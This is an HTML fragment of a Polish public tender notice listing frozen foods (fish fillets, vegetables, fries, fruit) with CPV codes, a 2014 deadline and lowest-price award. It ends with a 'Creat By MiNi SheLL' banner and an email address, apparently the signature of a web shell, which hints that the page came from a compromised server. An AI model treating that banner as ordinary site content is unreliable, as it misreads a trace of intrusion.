<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> produkty mrożone..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ryba mrożona - filet z mintaja
Ryba mrożona - filet z pangi 
Ryba mrożona - filet z dorsza bez  glazury
Fasolka szparagowa mrożona 2500g
marchew z groszkiem mrożona 2000g
mieszanka kompotowa 2500 g rabarbar truskawka
warzywa na patelnię  mrożone 450 g
mieszanka chińska mrożona 2500 g
brokuł mrożony 2000 g
kalafior mrożo0ny 2000 g
frytki  karbowane mrożone 2000g
kulki ziemniaczane , szyszki itp. 2000g typu Mc Cain mrożone lub równoważne
mieszanka warzywna 5 składnikowa 2500g mrożona
truskawka mrożona 2000g
szpinak mrożony 450g
dynia mrożona 450g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9, 15.22.10.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com